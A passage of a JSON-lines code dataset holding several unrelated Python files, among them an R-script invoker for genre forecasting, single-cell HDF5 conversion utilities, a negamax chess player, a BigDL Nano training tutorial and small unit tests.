permutation\n break\n\n if all(dd.assigned for dd in req_copy):\n return req_copy\n return None\n\n\ndef require_devdax(*dax_devices, **kwargs):\n def wrapped(tc):\n ctx.add_requirement(tc, 'devdax', tuple(dax_devices), **kwargs)\n return tc\n return wrapped\n","sub_path":"src/test/unittest/devdax.py","file_name":"devdax.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"326566526","text":"import logging\nimport subprocess\nimport re\n\nfrom time import sleep, time, ctime\nfrom datetime import datetime\nfrom random import random\n\n\nlogger = logging.getLogger(__name__)\n\nclass Model:\n def __init__(self, genre):\n self.genre = genre.upper()\n self.final_score = 0\n self.scores = []\n self.dates = []\n self.created = time()\n\n def process(self):\n if self.genre not in Genres():\n result = False\n message = 'Genre \"%s\" is not presented, sorry' % self.genre\n return result, message\n\n stdout, stderr = run_R_script(self.genre)\n if 'error' in stderr.lower():\n result = False\n message = stderr\n logger.error(stderr)\n return result, message\n\n self._process_script_result(stdout)\n self._process_scores_rating_for_Ljung_test()\n self._process_final_score()\n\n result = True\n message = ''\n return result, message\n \n def valid(self):\n return time() - self.created < 1000*60*60\n\n def _process_script_result(self, stdout):\n control_seq = re.compile(r'\"\\!\\&(\\w+)\"')\n command = None\n read_lines = 0\n\n vector_values = re.compile(r'(\\d+)')\n q_pattern = re.compile(r'^Q\\*\\s=\\s(\\d+\\.\\d+)')\n p_pattern = re.compile(r'p-value\\s[=<>]\\s(.+)$')\n\n accuracy_description = {\n 'ME': 'Mean Error',\n 'RMSE': 'Root Mean Squared Error',\n 'MAE': 'Mean Absolute Error',\n 'MPE': 'Mean Percentage Error',\n 'MAPE': 'Mean Absolute Scaled Error',\n 'MASE': 'Mean Absolute Scaled Error',\n 'ACF1': 'Autocorrelation of errors at lag 1',\n 'Q': 'Ljung-Box test',\n 'Q p-value': 
'Probability value of Q*',\n 'χ squared': 'Ljung-Box test',\n 'χ^2 p-value': 'Probability value of χ squared',\n }\n\n for line in stdout.split('\\n'):\n if command is None:\n seq = control_seq.findall(line)\n if len(seq) > 0:\n command = seq[0]\n read_lines = 0\n continue\n\n if len(line) > 0 and line[0] == '[':\n line = line[line.index(']') + 1:]\n\n if command == 'dates':\n dates = vector_values.findall(line)\n beginning = datetime(datetime.now().year, 1, 1).timestamp()\n for date in dates:\n self.dates.append(datetime.fromtimestamp(beginning + int(date)*24*60*60))\n\n command = None\n elif command in accuracy_description.keys() and read_lines == 1:\n line = line.strip()\n space_index = line.index(' ')\n training_set = float(line[:space_index])\n test_set = float(line[space_index:])\n raw, rating = self._calculate_rating(command, training_set)\n self.scores.append({\n 'name': command,\n 'value': training_set,\n 'help': accuracy_description[command],\n 'rating': rating,\n '_raw': raw,\n '_training_set': training_set,\n '_test_set': test_set\n })\n command = None\n elif command == 'ljung':\n if read_lines == 4:\n q_values = q_pattern.findall(line)\n if len(q_values) == 0:\n logger.error('Could not parse Q* value')\n else:\n q_value = float(q_values[0])\n self.scores.append({\n 'name': 'Q',\n 'value': q_value,\n 'help': accuracy_description['Q']\n })\n p_values = p_pattern.findall(line)\n if len(p_values) == 0:\n logger.error('Could not parse p-value')\n else:\n p_value = float(p_values[0])\n raw, rating = self._calculate_rating_for_p_value(p_value)\n self.scores.append({\n 'name': 'Q p-value',\n 'value': p_value,\n 'help': accuracy_description['Q p-value'],\n 'rating': rating,\n '_raw': raw\n })\n \n command = None\n elif command == 'chisqr':\n if read_lines == 1:\n chi_value = float(line)\n self.scores.append({\n 'name': 'χ squared',\n 'value': chi_value,\n 'help': accuracy_description['χ squared']\n })\n\n command = None\n elif command == 'chipvalue':\n if read_lines == 0:\n chi_p_value = float(line)\n raw, rating = self._calculate_rating_for_p_value(chi_p_value)\n self.scores.append({\n 'name': 'χ^2 p-value',\n 'value': chi_p_value,\n 'help': accuracy_description['χ^2 p-value'],\n 'rating': rating,\n '_raw': raw\n })\n\n command = None\n\n read_lines = read_lines + 1\n\n def _process_scores_rating_for_Ljung_test(self):\n q = None\n q_p_value = None\n chi = None\n chi_p_value = None\n for score in self.scores:\n if score['name'] == 'Q':\n q = score\n elif score['name'] == 'Q p-value':\n q_p_value = score\n elif score['name'] == 'χ squared':\n chi = score\n elif score['name'] == 'χ^2 p-value':\n chi_p_value = score\n\n if q_p_value['_raw'] < 0.80 or chi_p_value['_raw'] < 0.80:\n q['rating'] = 'x'\n q['_raw'] = 0\n chi['rating'] = 'x'\n chi['_raw'] = 0\n else:\n raw, rating = self._calculate_rating_for_Q(q['value'], chi['value'])\n q['rating'] = rating\n q['_raw'] = raw\n chi['rating'] = rating\n chi['_raw'] = raw\n\n def _process_final_score(self):\n final_score = 0\n if len(self.scores) == 0:\n self.final_score = 0\n return\n\n weight_distribution = {\n 'ME': 0.03,\n 'RMSE': 0.03,\n 'MAE': 0.03,\n 'MPE': 0.03,\n 'MAPE': 0.03,\n 'MASE': 0.03,\n 'ACF1': 0.03,\n 'Q': 0.25,\n 'Q p-value': 0.145,\n 'χ squared': 0.25,\n 'χ^2 p-value': 0.145,\n }\n\n for score in self.scores:\n per_score = weight_distribution[score['name']]\n score_weighted = score['_raw'] * per_score\n score_weighted = per_score if score_weighted > per_score else score_weighted\n final_score = final_score + score_weighted\n\n 
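# The weights above sum to 1.0 and each weighted term is clamped to its\n        # per-score budget, so the rescaled value below always lands in [0, 100].\n        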
final_score = round(final_score * 100)\n self.final_score = final_score\n\n def _calculate_rating(self, name, training_set):\n score_system = {\n 'ME': (0.5, 1.5),\n 'RMSE': (1.0, 2.5),\n 'MAE': (1.0, 2.5),\n 'MPE': (1.0, 2.5),\n 'MAPE': (4.0, 10.0),\n 'MASE': (1.0, 2.0),\n 'ACF1': (0.05, 0.5),\n }\n\n upper_limit = score_system[name]\n value = abs(training_set)\n if value == 0:\n return 0, '***'\n if value < upper_limit[0]:\n rating = '***'\n elif value < upper_limit[1]:\n rating= '**'\n else:\n rating = '*'\n\n return value, rating\n\n def _calculate_rating_for_Q(self, q, chi):\n if q > chi:\n return 1, '***'\n return 0, '*'\n\n def _calculate_rating_for_p_value(self, p):\n if p < 0.001:\n return 1.00, '***'\n if p < 0.01:\n return 0.85, '**'\n if p < 0.05:\n return 0.70, '*'\n if p < 0.1:\n return 0.50, '.'\n return 0, 'x'\n\n\ndef Genres():\n stdout, stderr = run_R_script('all')\n if 'error' in stderr.lower():\n logger.error(stderr)\n genre_value = re.compile(r'\"([a-zA-Z/&\\s]+)\"')\n return genre_value.findall(stdout)\n\ndef run_R_script(genre):\n proc = subprocess.Popen(\n ['Rscript', '--vanilla', '../model.R', '--genre=%s' % genre],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n proc.wait()\n stdout, stderr = proc.communicate()\n return str(stdout, 'utf-8'), str(stderr, 'utf-8')\n","sub_path":"course_project/service/analytics/invoker.py","file_name":"invoker.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"124772164","text":"import pandas\nimport h5py\nfrom sparsedat import wrappers as SDT_wrappers\nfrom sparsedat import Sparse_Data_Table\n\n\ndef write_pandas_csv(data_frame, file_path):\n pandas.DataFrame(data_frame)\\\n .to_csv(file_path, sep=',', encoding='utf-8', chunksize=1000)\n\n\ndef read_pandas_csv(file_path):\n return pandas.read_csv(file_path, sep=\",\", header=0, index_col=0)\n\n\ndef load_mtx(mtx_file_path, features_file_path, barcodes_file_path):\n\n if features_file_path is not None:\n with open(features_file_path, \"r\") as row_names_file:\n row_names = [line[:-1].strip() for line in row_names_file]\n row_names = [\" \".join(row_name.split(\"\\t\")[0:2])\n for row_name in row_names]\n else:\n row_names = None\n\n if barcodes_file_path is not None:\n with open(barcodes_file_path, \"r\") as column_names_file:\n column_names = [line[:-1].strip() for line in column_names_file]\n\n sdt = SDT_wrappers.load_mtx(mtx_file_path)\n sdt.row_names = row_names\n sdt.column_names = column_names\n\n return sdt\n\n\ndef convert_h5_to_sdt(\n h5_file_path,\n SDT_file_path,\n cells_as_rows=True\n):\n h5_file = h5py.File(h5_file_path)\n\n cellranger_version = 2\n\n if \"matrix\" in h5_file:\n cellranger_version = 3\n\n matrix_name = None\n\n if cellranger_version == 2:\n for key, value in h5_file.items():\n matrix_name = key\n break\n else:\n matrix_name = \"matrix\"\n\n sdt = Sparse_Data_Table()\n\n data = h5_file[matrix_name][\"data\"][()]\n indices = h5_file[matrix_name][\"indices\"][()]\n indptr = h5_file[matrix_name][\"indptr\"][()]\n\n if indices[0] > indices[1]:\n for column_index in range(len(indptr) - 1):\n data[indptr[column_index]:indptr[column_index + 1]] = \\\n data[indptr[column_index]:indptr[column_index + 1]][::-1]\n indices[indptr[column_index]:indptr[column_index + 1]] = \\\n indices[indptr[column_index]:indptr[column_index + 1]][::-1]\n else:\n for column_index in range(len(indptr) - 1):\n data[indptr[column_index]:indptr[column_index + 1]] = \\\n 
data[indptr[column_index]:indptr[column_index + 1]]\n indices[indptr[column_index]:indptr[column_index + 1]] = \\\n indices[indptr[column_index]:indptr[column_index + 1]]\n\n sdt.from_sparse_column_entries(\n (\n data,\n indices,\n indptr\n ),\n h5_file[matrix_name][\"shape\"][0],\n h5_file[matrix_name][\"shape\"][1]\n )\n\n if cellranger_version == 2:\n gene_names = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"gene_names\"])]\n gene_ids = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"gene_ids\"])]\n else:\n gene_names = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"features\"][\"name\"])]\n gene_ids = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"features\"][\"id\"])]\n\n gene_name_indices = {}\n\n disambiguated_gene_names = []\n\n for gene_index, gene in enumerate(gene_names):\n if gene not in gene_name_indices:\n gene_name_indices[gene] = [gene_ids[gene_index]]\n else:\n gene_name_indices[gene].append(gene_ids[gene_index])\n\n for gene_index, gene in enumerate(gene_names):\n\n if len(gene_name_indices[gene]) > 1:\n # Figure out which gene this is, as sorted by id\n this_gene_id = gene_ids[gene_index]\n duplicate_gene_index = sorted(gene_name_indices[gene]).index(\n this_gene_id)\n disambiguated_gene_name = \"%s_%i\" % (gene, duplicate_gene_index + 1)\n disambiguated_gene_names.append(disambiguated_gene_name)\n else:\n disambiguated_gene_names.append(gene)\n\n sdt.column_names = [x.decode(\"utf-8\") for x in\n h5_file[matrix_name][\"barcodes\"][()]]\n sdt.row_names = disambiguated_gene_names\n\n # Transpose so that rows are cells\n if cells_as_rows:\n sdt.transpose()\n\n sdt.save(SDT_file_path)\n\n return sdt\n","sub_path":"lesson_8/lesson_8/venv/lib/python3.8/site-packages/scrapi/utils/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"324673055","text":"import unittest\nfrom pygo1963.model.OpeningKnowledge import OpeningKnowledge\nfrom pygo1963.model.Constants import WHITE_COLOR, BLACK_COLOR\nfrom pygo1963.model.Board import Board\nfrom pygo1963.model.Move import Move\nfrom pygo1963.model.Vertex import Vertex\n\nclass OpeningKnowledgeTest(unittest.TestCase):\n\n def setUp(self):\n self.board = Board(6)\n\n def testFirstMove(self):\n \n openingKnowledge = OpeningKnowledge(WHITE_COLOR)\n \n move = openingKnowledge.get_opening_move(self.board)\n \n self.assertTrue(move)\n\n self.assertEqual(move, Move(WHITE_COLOR, Vertex.from_string(\"c3\")))\n \n def testSecondMove(self):\n \n self.board.make_move(Move(BLACK_COLOR, Vertex.from_string(\"c3\")))\n \n openingKnowledge = OpeningKnowledge(WHITE_COLOR)\n \n move = openingKnowledge.get_opening_move(self.board)\n \n self.assertTrue(move)\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"test/model/OpeningKnowledgeTest.py","file_name":"OpeningKnowledgeTest.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220792663","text":"from pyofss import *\n\nsys = System( Domain() )\n\ngaussian = Gaussian()\nsys.add( gaussian )\n\nsys.run()\n\nsys.field\n\nP_t = temporal_power( sys.field )\nP_nu = spectral_power( sys.field, True )\n\ndouble_plot( sys.domain.t, P_t,\n sys.domain.nu, P_nu,\n labels['t'], labels['P_t'], labels['nu'], 
labels['P_nu'])\n","sub_path":"1.System/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"529173536","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch\nfrom torchvision import transforms\nfrom torchvision.datasets import OxfordIIITPet\nfrom torch.utils.data.dataloader import DataLoader\nimport torch\nfrom torchvision.models import resnet18\nfrom bigdl.nano.pytorch import Trainer\nimport pytorch_lightning as pl\n\n\nclass MyLightningModule(pl.LightningModule):\n\n def __init__(self):\n super().__init__()\n self.model = resnet18(pretrained=True)\n num_ftrs = self.model.fc.in_features\n # Here the size of each output sample is set to 37.\n self.model.fc = torch.nn.Linear(num_ftrs, 37)\n self.criterion = torch.nn.CrossEntropyLoss()\n\n def forward(self, x):\n return self.model(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n output = self.model(x)\n loss = self.criterion(output, y)\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n output = self.forward(x)\n loss = self.criterion(output, y)\n pred = torch.argmax(output, dim=1)\n acc = torch.sum(y == pred).item() / (len(y) * 1.0)\n metrics = {'test_acc': acc, 'test_loss': loss}\n self.log_dict(metrics)\n\n def configure_optimizers(self):\n return torch.optim.SGD(self.parameters(), lr=0.01, momentum=0.9, weight_decay=5e-4)\n\n\ndef create_dataloaders():\n train_transform = transforms.Compose([transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ColorJitter(brightness=.5, hue=.3),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n val_transform = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\n # Apply data augmentation to the tarin_dataset\n train_dataset = OxfordIIITPet(root=\"/tmp/data\", transform=train_transform, download=True)\n val_dataset = OxfordIIITPet(root=\"/tmp/data\", transform=val_transform)\n\n # obtain training indices that will be used for validation\n indices = torch.randperm(len(train_dataset))\n val_size = len(train_dataset) // 4\n train_dataset = torch.utils.data.Subset(train_dataset, indices[:-val_size])\n val_dataset = torch.utils.data.Subset(val_dataset, indices[-val_size:])\n\n # prepare data loaders\n train_dataloader = DataLoader(train_dataset, batch_size=32)\n val_dataloader = DataLoader(val_dataset, batch_size=32)\n\n return train_dataloader, val_dataloader\n\n\nif __name__ == \"__main__\":\n\n model = MyLightningModule()\n train_loader, val_loader = create_dataloaders()\n\n # NHWC is an alternative way of describing the tensor dimensions.\n # NHWC performance is much better performance than NCHW (contiguous storage of tensor),\n # and 
operator coverage of NHWC would be higher than blocked memory format (to_mkldnn() method), \n # so user experience is better.\n #\n # by setting channels_last=True \n trainer = Trainer(max_epochs=5, channels_last=True)\n trainer.fit(model, train_dataloaders=train_loader)\n trainer.validate(model, dataloaders=val_loader)","sub_path":"python/nano/tutorial/training/pytorch-lightning/lightning_channel_last.py","file_name":"lightning_channel_last.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"491584199","text":"import chess\n\nclass AiPlayer:\n DEPTH = 4\n thres = 1\n pawntable = [\n 0, 0, 0, 0, 0, 0, 0, 0,\n 5, 10, 10,-20,-20, 10, 10, 5,\n 5, -5,-10, 0, 0,-10, -5, 5,\n 0, 0, 0, 20, 20, 0, 0, 0,\n 5, 5, 10, 25, 25, 10, 5, 5,\n 10, 10, 20, 30, 30, 20, 10, 10,\n 50, 50, 50, 50, 50, 50, 50, 50,\n 0, 0, 0, 0, 0, 0, 0, 0]\n\n knightstable = [\n -50,-40,-30,-30,-30,-30,-40,-50,\n -40,-20, 0, 5, 5, 0,-20,-40,\n -30, 5, 10, 15, 15, 10, 5,-30,\n -30, 0, 15, 20, 20, 15, 0,-30,\n -30, 5, 15, 20, 20, 15, 5,-30,\n -30, 0, 10, 15, 15, 10, 0,-30,\n -40,-20, 0, 0, 0, 0,-20,-40,\n -50,-40,-30,-30,-30,-30,-40,-50]\n\n bishopstable = [\n -20,-10,-10,-10,-10,-10,-10,-20,\n -10, 5, 0, 0, 0, 0, 5,-10,\n -10, 10, 10, 10, 10, 10, 10,-10,\n -10, 0, 10, 10, 10, 10, 0,-10,\n -10, 5, 5, 10, 10, 5, 5,-10,\n -10, 0, 5, 10, 10, 5, 0,-10,\n -10, 0, 0, 0, 0, 0, 0,-10,\n -20,-10,-10,-10,-10,-10,-10,-20]\n\n rookstable = [\n 0, 0, 0, 5, 5, 0, 0, 0,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n -5, 0, 0, 0, 0, 0, 0, -5,\n 5, 10, 10, 10, 10, 10, 10, 5,\n 0, 0, 0, 0, 0, 0, 0, 0]\n\n queenstable = [\n -20,-10,-10, -5, -5,-10,-10,-20,\n -10, 0, 0, 0, 0, 0, 0,-10,\n -10, 5, 5, 5, 5, 5, 0,-10,\n 0, 0, 5, 5, 5, 5, 0, -5,\n -5, 0, 5, 5, 5, 5, 0, -5,\n -10, 0, 5, 5, 5, 5, 0,-10,\n -10, 0, 0, 0, 0, 0, 0,-10,\n -20,-10,-10, -5, -5,-10,-10,-20]\n\n kingstable = [\n 20, 30, 10, 0, 0, 10, 30, 20,\n 20, 20, 0, 0, 0, 0, 20, 20,\n -10,-20,-20,-20,-20,-20,-20,-10,\n -20,-30,-30,-40,-40,-30,-30,-20,\n -30,-40,-40,-50,-50,-40,-40,-30,\n -30,-40,-40,-50,-50,-40,-40,-30,\n -30,-40,-40,-50,-50,-40,-40,-30,\n -30,-40,-40,-50,-50,-40,-40,-30]\n \n def __init__(self):\n self.count = 0\n self.maxdepth = 0\n self.curdepth = 0\n\n def evaluate(self, board, move=None):\n if move!=None:\n board = chess.Board(board.fen())\n board.push(move)\n \n return self.eval(board)\n \n def eval(self, board):\n if board.is_checkmate():\n if board.turn:\n return -99999\n else:\n return 99999\n if board.is_stalemate():\n return 0\n if board.is_insufficient_material():\n return 0\n \n wp = len(board.pieces(chess.PAWN, chess.WHITE))\n bp = len(board.pieces(chess.PAWN, chess.BLACK))\n wn = len(board.pieces(chess.KNIGHT, chess.WHITE))\n bn = len(board.pieces(chess.KNIGHT, chess.BLACK))\n wb = len(board.pieces(chess.BISHOP, chess.WHITE))\n bb = len(board.pieces(chess.BISHOP, chess.BLACK))\n wr = len(board.pieces(chess.ROOK, chess.WHITE))\n br = len(board.pieces(chess.ROOK, chess.BLACK))\n wq = len(board.pieces(chess.QUEEN, chess.WHITE))\n bq = len(board.pieces(chess.QUEEN, chess.BLACK))\n \n material = 100*(wp-bp)+320*(wn-bn)+330*(wb-bb)+500*(wr-br)+900*(wq-bq)\n \n pawnsq = sum([self.pawntable[i] for i in board.pieces(chess.PAWN, chess.WHITE)])\n pawnsq= pawnsq + sum([-self.pawntable[chess.square_mirror(i)] \n for i in board.pieces(chess.PAWN, chess.BLACK)])\n knightsq = sum([self.knightstable[i] for i in 
board.pieces(chess.KNIGHT, chess.WHITE)])\n knightsq = knightsq + sum([-self.knightstable[chess.square_mirror(i)] \n for i in board.pieces(chess.KNIGHT, chess.BLACK)])\n bishopsq= sum([self.bishopstable[i] for i in board.pieces(chess.BISHOP, chess.WHITE)])\n bishopsq= bishopsq + sum([-self.bishopstable[chess.square_mirror(i)] \n for i in board.pieces(chess.BISHOP, chess.BLACK)])\n rooksq = sum([self.rookstable[i] for i in board.pieces(chess.ROOK, chess.WHITE)]) \n rooksq = rooksq + sum([-self.rookstable[chess.square_mirror(i)] \n for i in board.pieces(chess.ROOK, chess.BLACK)])\n queensq = sum([self.queenstable[i] for i in board.pieces(chess.QUEEN, chess.WHITE)]) \n queensq = queensq + sum([-self.queenstable[chess.square_mirror(i)] \n for i in board.pieces(chess.QUEEN, chess.BLACK)])\n kingsq = sum([self.kingstable[i] for i in board.pieces(chess.KING, chess.WHITE)]) \n kingsq = kingsq + sum([-self.kingstable[chess.square_mirror(i)] \n for i in board.pieces(chess.KING, chess.BLACK)])\n \n eval = material + pawnsq + knightsq + bishopsq+ rooksq+ queensq + kingsq\n if board.turn:\n return eval\n else:\n return -eval\n \n def quisence(self, board, alpha, beta, depth = 0):\n self.count += 1\n self.maxdepth = max(self.maxdepth, self.DEPTH+depth)\n \n stand_pat = self.evaluate(board)\n if( stand_pat >= beta ):\n return beta\n if( alpha < stand_pat ):\n alpha = stand_pat\n \n for move in board.legal_moves:\n if board.is_capture(move):\n board.push(move) \n score = -self.quisence(board, -beta, -alpha, depth = depth+1 )\n board.pop()\n\n if( score >= beta ):\n return beta\n if( score > alpha ):\n alpha = score \n \n return alpha\n \n def interest(self, board, move):\n tmp = chess.Board(board.fen())\n tmp.push(move)\n return -len(board.attacks(move.from_square)) + len(tmp.attacks(move.to_square))\n \n def negamax(self, board, depth, alpha, beta):\n self.count += 1\n self.maxdepth = max(self.maxdepth, self.DEPTH - depth)\n \n if (depth <= 0):\n return self.quisence(board, alpha, beta)\n \n best = -999999\n for move in sorted([i for i in board.legal_moves], key=lambda move:self.evaluate(board, move)):\n \n d = min(depth-1, 1) if self.interest(board, move) < self.thres else depth-1\n board.push(move)\n \n score = -self.negamax(board, d, -beta, -alpha)\n \n board.pop()\n \n if (score >= beta):\n return score\n if (score > best):\n best = score\n if (score > alpha):\n alpha = score\n return best\n \n def nextMove(self, board):\n max = -999999\n self.count = 0\n self.maxdepth = 0\n res = chess.Move.null()\n alpha, beta = -999999, 999999\n for move in board.legal_moves:\n board.push(move)\n score = -self.negamax(board, self.DEPTH, -beta, -alpha)\n board.pop()\n if score >= beta:\n return score\n if score > max:\n max = score\n res = move\n if score > alpha:\n alpha = score\n return res\n \n def analysis(self):\n return {\"total nodes inspected: \":self.count, \"maximum depth: \":self.maxdepth}","sub_path":"AIplayer.py","file_name":"AIplayer.py","file_ext":"py","file_size_in_byte":7349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"569097721","text":"class Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n # a, b = sorted((nums1, nums2), key=len)\n m, n = len(nums1), len(nums2)\n cut_1 = 0\n cut_2 = 0\n\n # l1:max(nums1_left_part); r1:min(nums1_right_part)\n l1 = 0\n l2 = 0\n r1 = 0\n r2 = 0\n\n # Assume m = len(nums1) <= n, so the complexity stays O(log(min(m, n))); the assumption keeps things simple\n lo, hi = 0, m\n\n #### once the '#' separators are inserted, the array length becomes 2m+1\n # binary search\n while lo <= hi:\n # cut_1 and cut_2 are indices\n
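 # Invariant: a valid pair of cuts satisfies max(left parts) <= min(right parts),\n # i.e. l1 <= r2 and l2 <= r1; binary-search cut_1 until that holds.\n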
 cut_1 = (lo + hi) // 2 # result of this bisection step\n cut_2 = (m + n) // 2 - cut_1 - 1\n print(\"cut_1 middle number:\", nums1[cut_1], \"index is\", cut_1)\n print(\"cut_2 middle number:\", nums2[cut_2], \"index is\", cut_2)\n # input(\"etc...\")\n if nums1[cut_1] == \"#\":\n l1 = nums1[cut_1 - 1]\n r1 = nums1[cut_1 + 1]\n else:\n l1 = nums1[cut_1] # put the median into the left part\n # r1 = nums1[cut_1 + 1 + 1] # the first +1 lands on '#', the second moves right to a number\n r1 = nums1[cut_1] # the median belongs to both the left and the right part\n\n if nums2[cut_2] == \"#\":\n l2 = nums2[cut_2 - 1]\n r2 = nums2[cut_2 + 1]\n else:\n l2 = nums2[cut_2] # put the median into the left part\n # r2 = nums2[cut_2 + 1 + 1] # the first +1 lands on '#', the second moves right to a number\n r2 = nums2[cut_2] # the median belongs to both the left and the right part\n\n print(\"l1:\", l1)\n print(\"r1:\", r1)\n print(\"l2:\", l2)\n print(\"r2:\", r2)\n\n if l1 > r2:\n # move c1 left; c2 then moves right automatically\n hi = cut_1 - 1\n elif l2 > r1:\n # move c1 right\n lo = cut_1 + 1\n else:\n break\n print(\"Cut positions:\")\n print(\"nums1\", nums1, \"is cut at index\", cut_1)\n print(\"nums2\", nums2, \"is cut at index\", cut_2)\n middle = (max(l1, l2) + min(r1, r2)) / 2\n print(\"middle is:\", middle)\n return middle\n\n\nif __name__ == '__main__':\n # http://www.cnblogs.com/voidsky/p/5373982.html\n # nums1 = [4, 8, 10, 12, 18] # #4#8#10#12#18#\n nums1 = [1, 2, 4, 8, 10] # #4#8#10#12#18#\n nums1_signal = []\n for i in nums1:\n nums1_signal.append('#')\n nums1_signal.append(i)\n nums1_signal.append('#')\n\n nums2 = [1, 3, 5, 8, 9, 11, 13]\n nums2_signal = []\n for i in nums2:\n nums2_signal.append('#')\n nums2_signal.append(i)\n nums2_signal.append('#')\n s = Solution()\n print(nums1_signal)\n print(nums2_signal)\n input(\"etc...\")\n m = len(nums1_signal)\n n = len(nums2_signal)\n if m < n:\n res = s.findMedianSortedArrays(nums1_signal, nums2_signal)\n else:\n res = s.findMedianSortedArrays(nums2_signal, nums1_signal)\n print(res)\n","sub_path":"leetcode/lc-all-solutions-master/004.median-of-two-sorted-arrays/my_median-of-two-sorted-arrays.py","file_name":"my_median-of-two-sorted-arrays.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"473515788","text":"# Copyright 2014 - Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral import exceptions as exc\nfrom mistral.workflow import states\n\n\ndef _get_context(task_ex):\n return task_ex.runtime_context['with_items']\n\n\ndef get_count(task_ex):\n return _get_context(task_ex)['count']\n\n\ndef get_index(task_ex):\n return _get_context(task_ex)['index']\n\n\ndef get_concurrency_spec(task_spec):\n policies = task_spec.get_policies()\n\n return policies.get_concurrency() if policies else None\n\n\ndef get_indexes_for_loop(task_ex, task_spec):\n concurrency_spec = get_concurrency_spec(task_spec)\n concurrency = task_ex.runtime_context['concurrency']\n index = get_index(task_ex)\n\n number_to_execute = (get_count(task_ex) - index\n if not concurrency_spec else concurrency)\n\n return index, index + number_to_execute\n\n\ndef do_step(task_ex):\n with_items_context = _get_context(task_ex)\n\n if with_items_context['capacity'] > 0:\n
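 # consume one concurrency slot; 'capacity' tracks the task's concurrency policy limit\n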
 with_items_context['capacity'] -= 1\n\n with_items_context['index'] += 1\n\n task_ex.runtime_context.update({'with_items': with_items_context})\n\n\ndef prepare_runtime_context(task_ex, task_spec, input_dicts):\n runtime_context = task_ex.runtime_context\n with_items_spec = task_spec.get_with_items()\n\n if with_items_spec:\n # Prepare current indexes and parallel limitation.\n runtime_context['with_items'] = {\n 'capacity': get_concurrency_spec(task_spec),\n 'index': 0,\n 'count': len(input_dicts)\n }\n\n\ndef validate_input(with_items_input):\n # Take only mapped values and check them.\n values = with_items_input.values()\n\n if not all([isinstance(v, list) for v in values]):\n raise exc.InputException(\n \"Wrong input format for: %s. List type is\"\n \" expected for each value.\" % with_items_input\n )\n\n required_len = len(values[0])\n\n if not all(len(v) == required_len for v in values):\n raise exc.InputException(\n \"Wrong input format for: %s. All arrays must\"\n \" have the same length.\" % with_items_input\n )\n\n\ndef iterations_completed(task_ex):\n completed = all([states.is_completed(ex.state)\n for ex in task_ex.executions])\n return completed\n","sub_path":"mistral/workflow/with_items.py","file_name":"with_items.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"88422250","text":"#!/usr/bin/python3\nimport os\nimport time\nimport unittest\n\nimport HtmlTestRunner\n\nfrom common.appium_server import AppiumServer\nfrom common.create_test_script import create_test_script\nfrom common.variable import GetVariable as common\n\n\ndef main():\n # Get the current working directory\n def PATH(p): return os.path.abspath(p)\n path = os.getcwd()\n\n # Test script path\n case_path = PATH(os.path.join(path, 'case/script'))\n if not os.path.exists(case_path):\n os.makedirs(case_path)\n\n # Generate the test scripts\n # case path: case/case_yaml/home/title.yaml\n try:\n create_test_script(path, \"case/case_yaml\", \"case/script\")\n except FileNotFoundError as e:\n print(\"The test case file does not exist\")\n raise e\n # Test report and screenshot paths\n now = time.strftime(\"%Y-%m-%d_%H%M%S\")\n report_path = PATH(os.path.join(path,\"reports\",now))\n screen_path = PATH(os.path.join(report_path,\"screen\"))\n 